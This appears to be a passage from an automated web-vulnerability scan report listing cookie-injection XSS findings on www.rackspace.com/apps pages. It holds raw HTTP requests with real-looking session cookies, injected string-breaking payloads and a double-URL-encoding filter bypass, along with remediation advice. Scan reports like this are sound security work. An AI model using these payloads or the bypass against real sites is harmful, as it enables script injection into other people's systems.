Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85960e%2527%253b0f523ca6614; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b69bc%2527%253b0183427d981 was submitted in the IS_UASrackuid cookie. This input was echoed as b69bc';0183427d981 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_marketing_solutions/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b69bc%2527%253b0183427d981; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddfd7%2527%253b9acdb14780b was submitted in the IS_UASrackuid cookie. This input was echoed as ddfd7';9acdb14780b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_provider/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ddfd7%2527%253b9acdb14780b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5cb0%2527%253b984f54e5a1f was submitted in the IS_UASrackuid cookie. This input was echoed as b5cb0';984f54e5a1f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/fanatical_support/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b5cb0%2527%253b984f54e5a1f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee345%2527%253b64377c2636a was submitted in the IS_UASrackuid cookie. This input was echoed as ee345';64377c2636a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/file_sharing/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ee345%2527%253b64377c2636a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed5c6%2527%253bfd19e84fece was submitted in the IS_UASrackuid cookie. This input was echoed as ed5c6';fd19e84fece in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/file_sharing/hosted_sharepoint/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ed5c6%2527%253bfd19e84fece; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a26b4%2527%253b0f268ccf58a was submitted in the IS_UASrackuid cookie. This input was echoed as a26b4';0f268ccf58a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/r_customers/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a26b4%2527%253b0f268ccf58a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 845b0%2527%253b22b77f3deeb was submitted in the IS_UASrackuid cookie. This input was echoed as 845b0';22b77f3deeb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/reseller_program HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8845b0%2527%253b22b77f3deeb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30fc4%2527%253b939dc6e4314 was submitted in the IS_UASrackuid cookie. This input was echoed as 30fc4';939dc6e4314 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/reseller_program/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f830fc4%2527%253b939dc6e4314; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e5a7%2527%253b5acd2d719ad was submitted in the IS_UASrackuid cookie. This input was echoed as 2e5a7';5acd2d719ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/search/results/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f82e5a7%2527%253b5acd2d719ad; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13396%2527%253bba80f3d2c5f was submitted in the IS_UASrackuid cookie. This input was echoed as 13396';ba80f3d2c5f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/sitemap HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f813396%2527%253bba80f3d2c5f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
